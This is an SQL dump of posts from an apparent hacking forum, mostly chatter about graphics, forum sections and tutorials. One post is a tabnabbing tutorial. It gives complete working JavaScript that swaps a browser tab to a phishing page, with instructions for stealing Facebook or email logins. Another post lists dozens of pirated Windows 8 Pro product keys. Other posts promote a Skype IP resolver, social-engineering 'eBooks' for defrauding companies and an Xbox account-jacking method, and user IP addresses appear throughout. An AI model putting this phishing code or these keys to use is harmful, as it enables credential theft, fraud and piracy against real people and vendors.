[url=https://www.virustotal.com/file/9b83f9bb50746b0d039ed72d85133763137674690f72a22ef556b733de0eb878/analysis/1348573743/] Click[/url][/spoiler] Virus scanned it with Virus Total ^ Also, tested it on my Skype. Resolved the right IP. Hopefully no one DDoSes me :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0412036caa21c089237a015cc8eeb75c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2584', '431', '2531', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348589390', '[quote=\'NXK\' pid=\'2531\' dateline=\'1348497554\'] Size: Signature Colour Scheme: Any Render/Image: Aby thing you\'d like Text: NXk Anything else: I just want a signature, I\'m not good at making them so if you could help me out that would be nice. I don\'t mind what it looks like you can choose and do whatever you\'d like. [/quote] had no idea what you liked so I just made a simple one. [img]http://i.imgur.com/SSlBX.gif[/img] hope you liked it.', '46.50.93.164', '775052708', '1', '0', '62', '1348589498', '1', 'bb6c817b5b200c3b8776f3bf0fd217f6', '0', '1348589498'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2585', '514', '2551', '9', 'RE: How to make serious money', '0', '53', 'sirchamp', '1348597114', 'Yeah. This is quite well known but still its a great method. Im going to try this', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '5e491f81aa5c36c3da93996288957cd4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2586', '519', '2566', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '61', 'NXK', '1348600985', 'This is on 2 different forums right now since i\'m active on other forums, but I will work on a l33thacking only skype resolver. Maybe try to implement a log in system or something.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'bb739b48c8bbda6a84dcc4e99961defa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2609', '514', '2551', '9', 'RE: How to make serious money', '0', '82', 'iTzIpod', '1348618561', 'I know it\'s quite known. But not really. A lot of users don\'t know this method. And so that\'s one thing. Also, this method is unsaturated.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8db95f0643de15f99fbd68a28848f78e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2588', '519', '2566', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '82', 'iTzIpod', '1348608070', 'That would be great. That would probably stop leakers leaking our content. Such as your Skype IP Resolver. They would have to register on L33tHacking to use the Resolver. If that\'s what you mean by \"[b]Maybe try to implement a log in system or something.[/b]\"', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '62859233dfc0d02c1759344854babb16', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2589', '519', '2588', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '61', 'NXK', '1348608200', '[quote=\'iTzIpod\' pid=\'2588\' dateline=\'1348608070\'] That would be great. That would probably stop leakers leaking our content. Such as your Skype IP Resolver. They would have to register on L33tHacking to use the Resolver. If that\'s what you mean by \"[b]Maybe try to implement a log in system or something.[/b]\" [/quote] Yeah it is, Or a HWID system. [hr] API is down, Closing thread until I get a new one.', '99.253.94.204', '1677549260', '1', '0', '61', '1348629563', '1', 'c3b3f4da94b0c13d5c69472c78b4be20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2590', '520', '0', '34', 'How to make .GIF photos', '0', '82', 'iTzIpod', '1348615310', 'I am going to show you how to make a Video Gif like this: [img]http://i108.photobucket.com/albums/n37/CodeLyokoFreak1/7dcda2aa.gif[/img] By using Photoshop. First you are going to want to go to keepvid.com/ and put the video URL you would like. Next. once it pops up with what to download.. Make sure you download the .MP4 YOU ARE GOING TO WANT TO USE A VIDEO EDITING PROGRAM TO SHORTEN THE VIDEO TO THE PART YOU WOULD LIKE BECAUSE PS WILL NOT SUPPORT THAT MANY FRAMES Once you have edited your video. Open it in PS by going to.. FILE<IMPORT<VIDEO FRAMES TO LAYERS Once you find your video. Select it and click open Then this will pop up [img]http://gyazo.com/b22975112e75b4c820b54a3eb4897618.png[/img] Make sure it looks just like that Then Click Ok Allow it to make the layers(may take a minute) Once opened it should look like this [img]http://gyazo.com/7bd880312b59332e2eefb72577b7c972.png[/img] Once video is open. delete any unwanted Frames or add whatever text you would like Then you do a.. File. Save for web and devices The video may take a while to load.. once that is done. make sure. you save is as a .GIF The upload time to Photobucket takes a while. Just be patient', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '977988cb78ae508463e561e237d77894', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2591', '520', '2590', '34', 'RE: How to make .GIF photos', '0', '1', 't3h jok3r', '1348615432', 'Nice tutorial, even though Photoshop creates proffesional .gif images I think online video .GIF images are easier to create it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ef5b913ce9ce26d636bdebfbbaf40b7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2592', '520', '2590', '34', 'RE: How to make .GIF photos', '0', '82', 'iTzIpod', '1348615845', 'Thanks. Gonna fix all grammar and spelling mistakes on this thread after. Currently making an eBook on how to SE Starbucks xD (Just gonna be a paragraph calm your tits).', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fb55ce0d1126b7ffa40a87827e085523', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2593', '431', '2584', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '61', 'NXK', '1348616466', 'That\'s actually awesome man, Thank you!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'e97e7ae87aff1a65afbe0a122f9c207b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2594', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348616976', 'Nice signature NXK ;) Still waiting for the Unique Userbars. Take your time like I said. Don\'t need to rush it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4431ce000fcdbc06ab6d7f1fd5bbe7b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2595', '511', '2544', '5', 'RE: New forums suggestions', '0', '1', 't3h jok3r', '1348617109', 'Cool what about the computing and coding?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '645dcf33f89c6375c26fab1e18940452', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2596', '474', '2315', '25', 'RE: What antivirus you have?', '0', '7', 'Romdu62', '1348617350', '[quote=\'HoverCatz\' pid=\'2315\' dateline=\'1348004061\'] Microsoft Security Essentials (The best free) [/quote] I agree but still can\'t detect shit.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'db9b79252b1e5f6e375e0c2d2527c73b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2597', '508', '2538', '13', 'RE: Awesome deface page source + PSD', '0', '7', 'Romdu62', '1348617420', 'Awesome, looks beast. Thanks for the PSD.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '67c7429ab5c8f71988d6fb566e8e41f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2598', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '7', 'Romdu62', '1348617470', 'Learned a lot today thanks for the links.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '86278a6f8b60098dc3eb4fd7f76eb122', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2599', '520', '2590', '34', 'RE: How to make .GIF photos', '0', '7', 'Romdu62', '1348617546', 'Another great Photoshop tutorial.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1fa8eea8023f6c90ede07d712183e626', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2600', '511', '2544', '5', 'RE: New forums suggestions', '0', '82', 'iTzIpod', '1348617738', 'I don\'t know? :/ Like I said before, I\'ll suggest some forums when I\'m in a good mood. Because right now is not the time. Sorry.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '90d454bb128649acbaaeebbdef991498', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2601', '520', '2590', '34', 'RE: How to make .GIF photos', '0', '82', 'iTzIpod', '1348617772', 'Thank you for your feedback. Hopefully everyone can check this out and give it a try :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '66da2274361a3ae90d426d984961f482', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2602', '521', '0', '46', 'Advanced Tabnabbing Tutorial', '0', '5', 'Timmy', '1348617955', 'I will explain this tutorial using attack scenario and live example and how to protect yourself from such stuff. Let consider a attack scenario: 1. A hacker say(me Lokesh) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details) 2. I (Lokesh) sends a copy of this web page to victim whose account or whatever i want to hack. 3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script. 4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages. 5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one. 6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him. Here end\'s the attack scenario for advanced tabnabbing. Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so. Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing. Follow below measure to protect yourself from Tabnabbing: 1. Always use anti-java script plugin\'s in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc. 2. If you notice any suspicious things happening, then first of all verify the URL in the address bar. 3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL\'s. 4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks. 5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious. That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff.. Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level. First sample code for doing tabnabbing with the help of iframes: <!-- Title: Advanced Tabnabbing using IFRAMES and Java script Author: De$trUcTiVe M!ND (lokesh@hackingloops.com) Website: http://www.hackingloops.com Version:1.6 --> [code] <html> <head><title></title></head> <style type=\"text/css\"> html {overflow: auto;} html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;} iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;} </style> <body> <script type=\"text/javascript\"> //----------Set Script Options-------------- var REAL_PAGE_URL = \"http://www.google.com/\"; //This is the \"Real\" page that is shown when the user first views this page var REAL_PAGE_TITLE = \"Google\"; //This sets the title of the \"Real Page\" var FAKE_PAGE_URL = \"http://www.hackingloops.com\"; //Set this to the url of the fake page var FAKE_PAGE_TITLE = \"HackingLoops| Next Generation Hackers Portal\"; //This sets the title of the fake page var REAL_FAVICON = \"http://www.google.com/favicon.ico\"; //This sets the favicon. It will not switch or clear the \"Real\" favicon in IE. var FAKE_FAVICON = \"http://www.hackingloops.com/favicon.ico\"; //Set\'s the fake favicon. var TIME_TO_SWITCH_IE = \"4000\"; //Time before switch in Internet Explorer (after tab changes to fake tab). var TIME_TO_SWITCH_OTHERS = \"10000\"; //Wait this long before switching . //---------------End Options----------------- var TIMER = null; var SWITCHED = \"false\"; //Find Browser Type var BROWSER_TYPE = \"\"; if(/MSIE (\\d\\.\\d+);/.test(navigator.userAgent)){ BROWSER_TYPE = \"Internet Explorer\"; } //Set REAL_PAGE_TITLE document.title=REAL_PAGE_TITLE; //Set FAVICON if(REAL_FAVICON){ var link = document.createElement(\'link\'); link.type = \'image/x-icon\'; link.rel = \'shortcut icon\'; link.href = REAL_FAVICON; document.getElementsByTagName(\'head\')[0].appendChild(link); } //Create our iframe (tabnab) var el_tabnab = document.createElement(\"iframe\"); el_tabnab.id=\"tabnab\"; el_tabnab.name=\"tabnab\"; document.body.appendChild(el_tabnab); el_tabnab.setAttribute(\'src\', REAL_PAGE_URL); //Focus on the iframe (just in case the user doesn\'t click on it) el_tabnab.focus(); //Wait to nab the tab! if(BROWSER_TYPE==\"Internet Explorer\"){ //To unblur the tab changes in Internet Web browser el_tabnab.onblur = function(){ TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE); } el_tabnab.onfocus= function(){ if(TIMER) clearTimeout(TIMER); } } else { setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS); } function TabNabIt(){ if(SWITCHED == \"false\"){ //Redirect the iframe to FAKE_PAGE_URL el_tabnab.src=FAKE_PAGE_URL; //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE; //Change the favicon -- This doesn\'t seem to work in IE if(BROWSER_TYPE != \"Internet Explorer\"){ var links = document.getElementsByTagName(\"head\")[0].getElementsByTagName(\"link\"); for (var i=0; i<links.length; i++) { var looplink = links[i]; if (looplink.type==\"image/x-icon\" && looplink.rel==\"shortcut icon\") { document.getElementsByTagName(\"head\")[0].removeChild(looplink); } } var link = document.createElement(\"link\"); link.type = \"image/x-icon\"; link.rel = \"shortcut icon\"; link.href = FAKE_FAVICON; document.getElementsByTagName(\"head\")[0].appendChild(link); } } } </script> </body> </html> [/code] Now what you need to replace in this code to make it working say for Facebook: 1. REAL_PAGE_URL : www.facebook.com 2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More 3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL 4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More 5. REAL_FAVICON : www.facebook.com/favicon.ico 6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable) 7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes. 8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch. 9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original \'real\' page or some other Page. Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique). That\'s all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments. Credits in the thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '58f0cb8b2d4f0a1b5602da890ff76c42', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2603', '516', '2557', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '5', 'Timmy', '1348618001', 'Thanks for this, learned something new today.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b98b1381e12d4465d2c98b8a5ccae791', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2605', '248', '1056', '16', 'RE: [Free][EBook] How to SE a 3DS', '0', '82', 'iTzIpod', '1348618113', 'Updated links. Sorry for broken link.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '83c7458c7d238cae8e6f4985a2c68a20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2606', '247', '1055', '16', 'RE: [Free][EBook] How to SE Pringles', '0', '82', 'iTzIpod', '1348618162', 'Updated links. Sorry for the broken link. :/ Fixed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e06d667515989a8ba28f64839f4978be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2604', '494', '2447', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '5', 'Timmy', '1348618056', '[quote=\'iTzIpod\' pid=\'2447\' dateline=\'1348277992\'] But your body needs the nutrients the food gives you.. [/quote] I agree and you guys also need ATP.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a87d7379516e4a6b5c5b4b1a640c8ec4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2607', '522', '0', '16', '[Free][EBook] How to SE Starbucks', '0', '82', 'iTzIpod', '1348618387', 'Hey LH, Just trying to contribute to the forums. This eBook will not be guaranteed to work 100%. But it still works if you got the skills. To Download: http://adf.ly/DB5lZ', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c02d54d90c8d30ab2e3ed1dd0d450788', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2608', '516', '2557', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '82', 'iTzIpod', '1348618476', 'I don\'t need to use this method, I don\'t own a Xbox. Not planning on getting one too. Good luck everyone going to try this.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '036351c28554b2073b13a7333d4c05ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2610', '511', '2544', '5', 'RE: New forums suggestions', '0', '61', 'NXK', '1348629091', 'Ill send the gamers section info soon.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd0c1e81536044c06fa1a44c14e645477', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2611', '511', '2610', '5', 'RE: New forums suggestions', '0', '1', 't3h jok3r', '1348629239', '[quote=\'NXK\' pid=\'2610\' dateline=\'1348629091\'] Ill send the gamers section info soon. [/quote] Perfect and your thoughts on the computing and coding sections?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2d28d6b0c5dbf1cb3a4cc1fbf5e1aafe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2612', '511', '2611', '5', 'RE: New forums suggestions', '0', '61', 'NXK', '1348630357', '[quote=\'t3h jok3r\' pid=\'2611\' dateline=\'1348629239\'] [quote=\'NXK\' pid=\'2610\' dateline=\'1348629091\'] Ill send the gamers section info soon. [/quote] Perfect and your thoughts on the computing and coding sections? [/quote] I\'m fine with it all! Id love to see more sections', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '5b37f82bca6af25dd6679a3cd09b97eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2636', '490', '2635', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348707447', '[quote=\'R?????zo?\' pid=\'2635\' dateline=\'1348692042\'] add it like Consoles (PS3, XBOX, etc) Mobile and Tablet Gaming (iOS and Android) [/quote] So sections like PS3, XBOX should be subforums?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ed2a1a35cf37d9c4850f07de8312e10d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2614', '511', '2612', '5', 'RE: New forums suggestions', '0', '1', 't3h jok3r', '1348678258', '[quote=\'NXK\' pid=\'2612\' dateline=\'1348630357\'] [quote=\'t3h jok3r\' pid=\'2611\' dateline=\'1348629239\'] [quote=\'NXK\' pid=\'2610\' dateline=\'1348629091\'] Ill send the gamers section info soon. [/quote] Perfect and your thoughts on the computing and coding sections? [/quote] I\'m fine with it all! Id love to see more sections [/quote] That\'s what this thread is for. What new sections would you like to see in the computing and coding section?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'eec3b4a678c70c0cd275591bda107c5e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2615', '523', '0', '43', 'Windows 8 Pro Keys', '0', '1', 't3h jok3r', '1348679720', '1. Do a CLEAN install using one of these keys(IMPORTANT) 2. Do Not Turn on your internet connection. 3. Open the activation window and choose \"Activate by phone\" button. 4. Call Microsoft and enter the code from the automated message that you will hear. It works best with a real phone or mobile phone since you\'re going to call to a free number in your living country. 5. Microsoft Volume Licensing Activation Centers Worldwide Telephone Numbers Microsoft Volume Licensing - Activation Centers 6. If they ask about the number of computers that you will use this key, choose 1. [code] 967N4-R7KXM-CJKJB-BHGCW-CPKT7 RRYGR-8JNBY-V2RJ9-TJP4P-749T7 ND8P2-BD2PB-DD8HM-2926R-CRYQH F8X33-CNV3F-RH7MY-C73YT-XP73H BDDNV-BQ27P-9P9JJ-BQJ96-KTJXV KNTGM-BGJCJ-BPH3X-XX8V4-K4PKV CDQND-9X68R-RRFYH-8G28W-82KT7 7HBX7-N6WK2-PF9HY-QVD2M-JK49V 4NMMK-QJH7K-F38H2-FQJ24-2J8XV HNRGD-JP8FC-6F6CY-2XHYY-RCWXV KQWNF-XPMXP-HDK3M-GBV69-Y7RDH F2M4V-KFNB7-9VVTW-MVRBQ-BG667 VHNT7-CPRFX-7FRVJ-T8GVM-8FDG7 GPTCC-XN297-PVGY7-J8FQY-JK49V HV3TW-MMNBG-X99YX-XV8TJ-2GV3H 2GVN8-TV3C2-K3YM7-MMRVM-BBFDH 84NRV-6CJR6-DBDXH-FYTBF-4X49V CR8NP-K37C3-MPD6Q-MBDDY-8FDG7 39DQ2-N4FYQ-GCY6F-JX8QR-TVF9V Q4NBQ-3DRJD-777XK-MJHDC-749T7 D32KW-GNPBK-CV3TW-6TB2W-K2BQH NBWPK-K86W9-27TX3-BQ7RB-KD4DH 2NF99-CQRYR-G6PQ9-WYGJ7-8HRDH F7BDM-KTNRW-7CYQP-V98KC-W2KT7 4JKWV-MNJCY-8MW3Q-VJYGP-DC73H FFX8D-N3WMV-GM6RF-9YRCJ-82KT7 2CMGK-NMW4P-B846H-YXR6P-27F9V D2GBF-NGBW4-QQRGG-W38YB-BBFDH NTVHT-YF2M4-J9FJG-BJD66-YG667 GBJJV-YNF4T-R6222-KDBXF-CRYQH 3NHJ7-3WWQK-4RFTH-8FHJY-PRYQH 988NM-XKXT9-7YFWH-H2Q3Q-C34DH TGXN4-BPPYC-TJYMH-3WXFK-4JMQH N9C46-MKKKR-2TTT8-FJCJP-4RDG7 2VTNH-323J4-BWP98-TX9JR-FCWXV D7KN2-CBVPG-BC7YC-9JDVJ-YPWXV 2GVN8-TV3C2-K3YM7-MMRVM-BBFDH 4NMMK-QJH7K-F38H2-FQJ24-2J8XV 76NDP-PD4JT-6Q4JV-HCDKT-P7F9V 7HBX7-N6WK2-PF9HY-QVD2M-JK49V 84NRV-6CJR6-DBDXH-FYTBF-4X49V 967N4-R7KXM-CJKJB-BHGCW-CPKT7 BDDNV-BQ27P-9P9JJ-BQJ96-KTJXV CDQND-9X68R-RRFYH-8G28W-82KT7 DWV49-3GN3Q-4XMT7-QR9FQ-KKT67 F2M4V-KFNB7-9VVTW-MVRBQ-BG667 F8X33-CNV3F-RH7MY-C73YT-XP73H GPTCC-XN297-PVGY7-J8FQY-JK49V HV3TW-MMNBG-X99YX-XV8TJ-2GV3H J6FW2-HQNPJ-HBB6H-K9VTY-2PKT7 KQWNF-XPMXP-HDK3M-GBV69-Y7RDH MMRNH-BMB4F-87JR9-D72RY-MY2KV 